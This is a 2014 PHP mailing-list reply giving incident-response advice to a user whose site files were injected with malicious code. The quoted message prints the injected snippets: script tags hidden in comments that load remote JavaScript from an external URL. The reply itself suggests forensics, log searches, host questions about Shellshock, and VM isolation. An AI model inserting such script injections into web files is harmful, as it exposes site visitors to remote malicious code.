On Fri, Oct 03, 2014 at 07:54:22PM -0400, Jim Giner wrote: > If anyone is interested here is what is being inserted into random html > and php files: > > <!--f853a8--><script type="text/javascript" > src="http://hs-eventogbooking.dk/mytdhzzp.php?id=9625138";></script><!--/f853a8--> > > and > > <!--83b914--><script type="text/javascript" > src="http://n/mytdhzzp.php?id=9625233";></script><!--/83b914--> > Hi Jim, Thanks for being open and sharing this information. I'm sorry I'm late to the party. IANAE on security, but I have some experience with forensics and server administration as well as identifying attack vectors in PHP and ColdFusion and mitigating them. Off the top of my head, this *looks* a tad like code injection via an unknown vector. By chance, are these code snippets attached to the *end* of the files that contain them? Keep copies of the infected files, with accurate timestamps for the date of last modification. If you can obtain server access logs, it would be prudent to search them (with a "find" tool, like Unix 'grep' or the search features of your favorite editor, for the strings in the HTML comment sections, portions of the suspect URLs, etc. Your web host will perhaps listen well if you pay them well, and the less you pay them, the less likely they are to be concerned. However, I would open a ticket and advise them of what has occurred. Ask them some questions, like what kind of security software is installed on their shared server, whether or not they monitor network traffic for suspect packets, *whether or not the server is vulnerable to "bash shell shock" (CVE-2014-6271 and CVE-2014-7169) (also known as "bashdoor")*. If your website has *no* third-party software built in, that's good news, up to a point. It may indeed be that your code is "tough enough" and the hole was not in your code. Given the severity of ShellShock and the fact that your server contains other peoples' sites as well, which may have 3rd party packages that are vulnerable, I might think rather seriously about using a VM, as others have suggested, in the future if at all feasible. Hope this helps, Kevin Kinsey -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
